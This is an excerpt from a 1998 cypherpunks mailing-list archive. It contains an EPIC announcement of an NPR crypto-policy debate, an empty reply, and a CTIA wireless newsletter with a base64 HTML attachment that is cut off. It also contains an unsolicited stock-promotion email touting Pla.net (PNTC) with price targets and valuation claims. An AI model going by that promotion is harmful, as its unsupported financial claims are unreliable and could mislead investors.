To: misc <info@epic.org>
Subject: NPR Debate on Crypto
Message-ID: <v04011708b20719be9339@[204.254.20.26]>
MIME-Version: 1.0
Content-Type: text/plain


FYI,

NPR's Talk of the Nation is having an hour-long debate on crypto policy
this afternoon with Undersecretary of Commerce William Reinsch, RSA's Lynn
McNulty and myself. A good portion of the show is dedicated to callers so
if you have any export control questions, this is the time to ask....

-dave
-------
David Banisar (Banisar@epic.org)                *    202-544-9240 (tel)
Electronic Privacy Information Center           *    202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301             *    HTTP://www.epic.org
Washington, DC 20003 * PGP Key  http://www.epic.org/staff/banisar/key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uno24@hotmail.com
Date: Mon, 24 Aug 1998 09:17:19 -0700 (PDT)
To: Friend@public.com
Subject: HOT INTERNET STOCKS: THE NEXT AOL!!??
Message-ID: <199808241603.BAA05176@mail.kagoshima-it.go.jp>
MIME-Version: 1.0
Content-Type: text/plain


*You are receiving this one time financial e-mail because you 
have expressed interest in Internet stocks.   
Your name will automatically be REMOVED.
__________________________________________________________
THE NEXT AOL!!??

Pla.net America, Inc.

Symbol: PNTC

Price:  3


"Pla.net may in the mid to long term go as high as $15-20 
per share based on projected EPS and a book value of $11.64",
an Internet analyst states.

Pla.net's (LAW(tm)) incorporates a Lotus Domino platform hosted by
the IBM Global Network.  The result is a level of speed, 
reliability and security not easily matched in the online world.

Pla.net is ahead of schedule for their North America-wide launch
on September 14th.  On September 14th,  Pla.net will be ready to 
light up North America with 62 sites activated, covering every 
state capital, plus Washington D.C. and Ottawa Canada.

Pla.net's Intranet system is designed to capitalize on the fact 
that 90% of commerce is done locally.  The Company plans on 
selling over 325 sites in the U. S. over a 3-year period.  The 
offering price on each site sold gives the Company $500,000,  per 
site, in the initial phase of development. 

R.J. Prichard & Associates has determined that the IP (Pla.net's 
Intranet solution software) is valued at over $65,000,000 as of 
August 1,  1998.  This valuation is a significant increase from the 
previous Valuation of the "Smart Community(tm) Software"  dated 
November 18,  1994 and updated on December 21,  1995.  At the time 
the Valuation came in at 6 million and 8 million respectively.

This analyst believes, and we quote, "Pla.net is the only Internet
stock currently trading at 25% of its book value".  "With a market 
cap of 17 million and a book value of 65 million Pla.net is poised 
to break out at or around $5.00 per share",  he adds.  

Latest news on PNTC:http://biz.yahoo.com/bw/980812/pla_net_am_1.html
______________________________________________________________
*You are receiving this one time financial e-mail because you 
have expressed interest in Internet stocks.   
Your name will automatically be REMOVED.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Betsy McPherson <McPhersonb@ten-nash.ten.k12.tn.us>
Date: Mon, 24 Aug 1998 10:23:08 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <01J0ZCL8BN2G8WWZW3@ten-nash.ten.k12.tn.us>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 24 Aug 1998 10:55:24 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 24, 1998
Message-ID: <199808241751.MAA07545@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/    for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00011.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00011.bin"
Content-Description: "_CTIA_Daily_News_19980824a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMjQsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNlbGwgUGhvbmUgR1BTIEFsbG93cwpQ
cmVjaXNlIFBlb3BsZS1GaW5kaW5nPC9GT05UPjwvRk9OVD48L0I+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkp1c3QgcHVzaCBhIGJ1dHRvbiBhbmQg
eW91ciBwcmVjaXNlIGxvY2F0aW9uLAppbmNsdWRpbmcgbGF0aXR1ZGUsIGxv
bmdpdHVkZSBhbmQgZWxldmF0aW9uIGNhbiBiZSBzZW50IHRvIGEgOTExLWxp
a2UgZW1lcmdlbmN5CnNlcnZpY2UgdGhhdCB3aWxsIHNlbmQgc29tZW9uZSB0
byB5b3VyIGFpZC4gKDxBIEhSRUY9Imh0dHA6Ly93d3cuYWJjbmV3cy5jb20v
c2VjdGlvbnMvdGVjaC9EYWlseU5ld3MvZ3BzcGhvbmU5ODA4MjEuaHRtbCI+
QUJDCk5FV1M8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5BcyBXaXJlbGVzcyBUZWNobm9sb2d5
CkFkdmFuY2VzLCBDZWxsLVBob25lIFNpemUmbmJzcDs8L0ZPTlQ+PC9GT05U
PjwvQj4KPEJSPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZP
TlQgU0laRT0rMT5Vc3VhbGx5IE1hdHRlcnM8L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+TWFueSBoZWF2eSB3aXJlbGVz
cyB1c2VycyBjaG9vc2UgdGhlaXIKcHJvdmlkZXIgYmFzZWQgb24gdGhlIGtp
bmQgb2YgcGhvbmUgdGhleSBjYW4gYnV5LiAoPEEgSFJFRj0iaHR0cDovL2lu
dGVyYWN0aXZlLndzai5jb20vZWRpdGlvbi9jdXJyZW50L2FydGljbGVzL1NC
OTAzOTEwODY0MzM5OTE0NTAwLmh0bSI+V0FMTApTVC4gSk9VUk5BTDwvQT4p
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBTSVpFPSsxPkZvcmdldCB0aGUgQ0IgSGFuZGxlLApHb29kIEJ1ZGR5LCBN
b2Rlcm4gVHJ1Y2tlcnMgSGF2ZSBFLU1haWw8L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIHRlY2hub2xvZ3kgcmVk
dWNlcyBkZWxheXMgYW5kIGN1dHMKY29zdHMuICg8QSBIUkVGPSJodHRwOi8v
d3d3LmJvc3Rvbi5jb20vZGFpbHluZXdzL3dpcmVodG1sLzIzNi9Gb3JnZXRf
dGhlX0NCX2hhbmRsZV9fZ29vZF9idWRkeV9fXy5zaHRtbCI+Qk9TVE9OCkdM
T0JFPC9BPikgLSAoPEEgSFJFRj0iaHR0cDovL3d3dy5hYmNuZXdzLmNvbS9z
ZWN0aW9ucy90ZWNoL0RhaWx5TmV3cy90cnVja2VyX2VtYWlsOTgwODI0Lmh0
bWwiPkFCQwpORVdTPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VG95b3RhLCBPdGhlciBBdXRv
IE1ha2Vycwp0byBCZWdpbiBBdXRvbWF0aWMgRW1lcmdlbmN5Jm5ic3A7PC9G
T05UPjwvRk9OVD48L0I+CjxCUj48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9KzE+Q2FsbCBTZXJ2aWNlPC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNhcnMgd2lsbCBj
YXJyeSBzZW5zb3JzIGFuZCBpbnRlcmFjdGl2ZQpjb21tdW5pY2F0aW9ucyBz
eXN0ZW1zLiBXaGVuIGEgY2FyIGhhcyBhbiBhY2NpZGVudCwgYSBjYWxsIHNp
Z25hbCB3aWxsCmJlIHNlbnQgYXV0b21hdGljYWxseSB0byBhbiBlbWVyZ2Vu
Y3kgc2VydmljZSBjZW50ZXIuIFRoZSBzZXJ2aWNlIGNlbnRlcgp3aWxsIHRo
ZW4gY2FsbCB0aGUgcG9saWNlIG9yIGZpcmUgc2VydmljZXMgZm9yIGhlbHAu
ICg8QSBIUkVGPSJodHRwOi8vd3d3Lm5pa2tlaS5jby5qcC9lbmV3cy9UTktT
L3BhZ2UvVG9wX1N0b3JpZXMuaHRtbCNnZW4xMjkiPk5JS0tFSTwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPlNpZW1lbnMsIE1vdG9yb2xhIFNhaWQKdG8gU2VlayBNb2JpbGUg
UGhvbmUgVmVudHVyZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5TaWVtZW5zIHdhbnRzIHRvIGpvaW4gZm9yY2VzIGlu
IG1vYmlsZQp0ZWxlcGhvbmUgcHJvZHVjdGlvbiB3aXRoIFUuUy4gcml2YWwg
TW90b3JvbGEsIGEgbmV3c3BhcGVyIHNhaWQgU3VuZGF5LgooPEEgSFJFRj0i
aHR0cDovL3d3dy5ib3N0b24uY29tL2RhaWx5bmV3cy93aXJlaHRtbC8yMzUv
U2llbWVuc19fTW90b3JvbGFfc2FpZF90b19zZWVrX21vYmkuc2h0bWwiPkJP
U1RPTgpHTE9CRTwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly9kYWlseW5ld3Mu
eWFob28uY29tL2hlYWRsaW5lcy9icy9zdG9yeS5odG1sP3M9di9ubS8xOTk4
MDgyNC9icy9tb3Rvcm9sYV8xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
RXJpY3Nzb24ncyBQdXJjaGFzZSBvZgpMb25kb24gT2ZmaWNlIFJhaXNlcyBT
cGVjdWxhdGlvbiZuYnNwOzwvRk9OVD48L0ZPTlQ+PC9CPgo8QlI+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPm9mIFBv
c3NpYmxlIE1vdmU8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+SW4gdGhlIGxhc3QgZmV3IHllYXJzLCBFcmljc3NvbiBo
YXMgc2FpZAppdCBjb3VsZCBtb3ZlIGl0cyBoZWFkcXVhcnRlcnMgYXdheSBm
cm9tIFN3ZWRlbiBiZWNhdXNlIHRoZSBjb3VudHJ5J3MgaGlnaAppbmNvbWUg
dGF4ZXMgbWFrZSBpdCBkaWZmaWN1bHQgdG8gcmVjcnVpdCB0YWxlbnQgZnJv
bSBvdGhlciBjb3VudHJpZXMuCig8QSBIUkVGPSJodHRwOi8vaW50ZXJhY3Rp
dmUud3NqLmNvbS9lZGl0aW9uL2N1cnJlbnQvYXJ0aWNsZXMvU0I5MDM3Mjcz
ODgxMDczODAwMDAuaHRtIj5XQUxMClNULiBKT1VSTkFMPC9BPik8L0ZPTlQ+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
KzE+Tm9ydGVsLCBCYXkgTmV0d29ya3MKTWVyZ2VyIFdpbnMgUmVndWxhdG9y
eSBPa2F5czwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5UaGUgcHJvcG9zZWQgVVMkOS4xIGJpbGxpb24gbWVyZ2VyIHdv
bgprZXkgYXBwcm92YWxzIGZyb20gdGhlIEV1cm9wZWFuIENvbW1pc3Npb24g
YW5kIHRoZSBDYW5hZGlhbiBDb21wZXRpdGlvbgpCdXJlYXUuICg8QSBIUkVG
PSJodHRwOi8vd3d3LmludGVybmV0bmV3cy5jb20vUmV1dGVycy8xOTk4LzA4
LzI0MDUtbm9ydGVsLmh0bWwiPklOVEVSTkVUCk5FV1MuQ09NPC9BPikgLSAo
PEEgSFJFRj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS93aXJlL3N0b3J5L3Jl
dXRlcnMvUkVVMTk5ODA4MjFTMDAwMyI+VEVDSFdFQjwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PkxlZ2lzbGF0b3JzIGFuZCBSZWd1bGF0b3JzCkZhY2UgYSBEYXVudGluZyBD
aGFsbGVuZ2U8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+VGhlIFRlbGVjb21tdW5pY2F0aW9ucyBBY3Qgb2YgMTk5NiBp
cwpzYWlkIHRvIGhhdmUgZmFpbGVkIHRvIGRlbGl2ZXIgb24gaXRzIHByb21p
c2Ugb2YgaW5jcmVhc2VkIGNvbXBldGl0aW9uLiZuYnNwOwpHaWFudCBtZXJn
ZXJzIGFuZCBJbnRlcm5ldCB0ZWNobm9sb2dpZXMgYXJlIGNoYW5naW5nIHRo
ZSB0ZWxlY29tbXVuaWNhdGlvbnMKbWFya2V0cGxhY2UgaW4gd2F5cyBubyBv
bmUgYW50aWNpcGF0ZWQuICg8QSBIUkVGPSJodHRwOi8vd3d3LnRoZXN0YW5k
YXJkLm5ldC9hcnRpY2xlcy9uZXdzX2Rpc3BsYXkvMCwxMjcwLDE0NDEsMDAu
aHRtbCI+VEhFCklORFVTVFJZIFNUQU5EQVJEPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+R2xv
YmFsc3RhciB0byBEZXBsb3kKRFNDJ3MgSU5mdXNpb24oVE0pIEhMUiBhbmQm
bmJzcDs8L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxCPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5BdXRoZW50aWNhdGlvbiBD
ZW50ZXIKQXBwbGljYXRpb25zPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPkdsb2JhbHN0YXIgd2lsbCB1c2UgdGhlIHBy
b2R1Y3RzIHRvIGltcGxlbWVudApnbG9iYWwgcm9hbWluZyBhbmQgcHJvdmlk
ZSBhZHZhbmNlZCBhdXRob3JpemF0aW9uIGFuZCBmcmF1ZCBwcmV2ZW50aW9u
CmNhcGFiaWxpdGllcyBmb3IgaXRzIHdvcmxkd2lkZSBjdXN0b21lcnMuIEds
b2JhbHN0YXIgaXMgc2NoZWR1bGVkIHRvIGJlZ2luCm9mZmVyaW5nIHdpcmVs
ZXNzIHRlbGVwaG9uZSBhbmQgb3RoZXIgdGVsZWNvbW11bmljYXRpb25zIHNl
cnZpY2VzIHdvcmxkd2lkZQpiZWdpbm5pbmcgaW4gMTk5OS4gKDxBIEhSRUY9
Imh0dHA6Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA4MjQvdHhfZ2xvYmFs
c18xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+TW90b3JvbGEgU2VsZWN0
cyBOdWFuY2UKYXMgTmF0dXJhbCBMYW5ndWFnZSBTcGVlY2ggUmVjb2duaXRp
b24gUHJvdmlkZXIgZm9yICdNeW9zcGhlcmUnIFNlcnZpY2U8L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+V2l0aCBNeW9z
cGhlcmUsIHdpcmVsaW5lLCB3aXJlbGVzcywgbG9uZy1kaXN0YW5jZQphbmQg
b3RoZXIgY29tbXVuaWNhdGlvbnMgY2FycmllcnMgYXMgd2VsbCBhcyBJU1Bz
IHdpbGwgYmUgYWJsZSB0byBvZmZlcgp0aGVpciBjdXN0b21lcnMgc2Vydmlj
ZXMsIGluY2x1ZGluZyB0aGUgYWJpbGl0eSB0byBtYWtlIG11bHRpcGxlIGNh
bGxzLApzZW5kIHBhZ2VzIGFuZCBhY2Nlc3Mgb25saW5lIGluZm9ybWF0aW9u
IHN1Y2ggYXMgd2VhdGhlciBhbmQgc3RvY2sgcmVwb3J0cwpzaW1wbHkgYnkg
ZGlhbGluZyBvbmUgdG9sbC1mcmVlIG51bWJlci4gTXlvc3BoZXJlIHdpbGwg
ZmVhdHVyZSBhIHZlcnkgZmxleGlibGUKbmF0dXJhbCBpbnRlcmZhY2UgdGhh
dCB3aWxsIGFsbG93IHVzZXJzIHRvIHNwZWFrIHRvIGl0IGluIHRoZSBzYW1l
IHdheQp0aGV5IHNwZWFrIHRvIGEgcGVyc29uLCBwcm92aWRpbmcgaW5zdHJ1
Y3Rpb25zIHN1Y2ggYXMgImNhbGwgVG9tIGluIGhpcwpjYXInJyBvciAicGFn
ZSBteSB3aWZlLicnICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNvbS9w
cm5ld3MvOTgwODI0L2NhX21vdG9yb2xfMS5odG1sIj5ZQUhPTzwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPk1hdGhXb3JrcywgQWxnb3JleCB0bwpEZXZlbG9wIERpZ2l0YWwg
U2lnbmFsIFByb2Nlc3NvciBTaW11bGF0aW9uIFRvb2xzIGZvciBXaXJlbGVz
cyBDb21tdW5pY2F0aW9uczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj5VbmRlciB0aGUgQWdyZWVtZW50LCBOYXRpY2ss
IE1hc3MuLWJhc2VkCk1hdGhXb3JrcyB3aWxsIHByb3ZpZGUgRFNQIGFsZ29y
aXRobSBkZXNpZ24gc29mdHdhcmUsIGFuZCBJc2VsaW4sIE4uSi4tYmFzZWQK
QWxnb3JleCB3aWxsIHByb3ZpZGUgd2lyZWxlc3MgY29tbXVuaWNhdGlvbiBk
ZXNpZ24gdG9vbHMuICg8QSBIUkVGPSJodHRwOi8vd3d3LnRlY2h3ZWIuY29t
L3dpcmUvc3RvcnkvVFdCMTk5ODA4MjFTMDAwOCI+VEVDSFdFQjwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPkNvbm5lY3RpY3V0IFBob25lIENvbXBhbnkKV29ya2VycyBHbyBv
biBTdHJpa2U8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+QWJvdXQgNiwzMDAgb3BlcmF0b3JzLCBjdXN0b21lciBzZXJ2
aWNlCnJlcHJlc2VudGF0aXZlcyBhbmQgdGVjaG5pY2lhbnMgZm9yIFNvdXRo
ZXJuIE5ldyBFbmdsYW5kIFRlbGVjb21tdW5pY2F0aW9ucwp3ZW50IG9uIHN0
cmlrZSBTdW5kYXkgYWZ0ZXIgbmVnb3RpYXRpb25zIGJldHdlZW4gY29tcGFu
eSBleGVjdXRpdmVzIGFuZAp1bmlvbiBsZWFkZXJzIHdlcmUgY3V0IG9mZi4g
KDxBIEhSRUY9Imh0dHA6Ly93d3cuYm9zdG9uLmNvbS9kYWlseW5ld3Mvd2ly
ZWh0bWwvMjM1L0Nvbm5lY3RpY3V0X3Bob25lX2NvbXBhbnlfd29ya2Vyc19n
LnNodG1sIj5CT1NUT04KR0xPQkU8L0E+KTwvRk9OVD48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5ObyBQcm9ncmVz
cyBpbiBVIFMgV0VTVApTdHJpa2U8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+QSBVdGFoIGp1ZGdlIGlzc3VlZCBhIHRl
bXBvcmFyeSByZXN0cmFpbmluZwpvcmRlciBwcm9oaWJpdGluZyB1bmlvbiB3
b3JrZXJzIGZyb20gcGlja2V0aW5nIGF0IHRoZSByZWdpb25hbCB0ZWxlcGhv
bmUKY29tcGFueSdzIGJ1aWxkaW5ncyBpbiBVdGFoIGFzIGEgc3RyaWtlIGVu
ZGVkIGl0cyBmaXJzdCB3ZWVrLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5kZW52
ZXJwb3N0LmNvbS9idXNpbmVzcy9iaXowODI0ZC5odG0iPkRFTlZFUgpQT1NU
PC9BPikgLSAoPEEgSFJFRj0iaHR0cDovL3d3dy5uZXdzLmNvbS9OZXdzL0l0
ZW0vVGV4dG9ubHkvMCwyNSwyNTU4MywwMC5odG1sP3BmdiI+Q05FVApORVdT
LkNPTTwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly93d3cuYm9zdG9uLmNvbS9k
YWlseW5ld3Mvd2lyZWh0bWwvMjM1L05vX3Byb2dyZXNzX2luX1VfU19XZXN0
X3N0cmlrZV9fU05FLnNodG1sIj5CT1NUT04KR0xPQkU8L0E+KSAtICg8QSBI
UkVGPSJodHRwOi8vc2VhcmNoLndhc2hpbmd0b25wb3N0LmNvbS93cC1zcnYv
V0FQTy8xOTk4MDgyNC9WMDAwMzM5LTA4MjQ5OC1pZHguaHRtbCI+V0FTSElO
R1RPTgpQT1NUPC9BPikgLSAoPEEgSFJFRj0iaHR0cDovL3d3dy5mb3htYXJr
ZXR3aXJlLmNvbS8wODI0OTgvcGhvbmVzdHJpa2VzLnNtbCI+Rk9YCk5FV1M8
L0E+KSAtICg8QSBIUkVGPSJodHRwOi8vd3d3LmF6Y2VudHJhbC5jb20vbmV3
cy8wODI0cGhvbmVzdHJpa2VzLnNodG1sIj5BUklaT05BClJFUFVCTElDPC9B
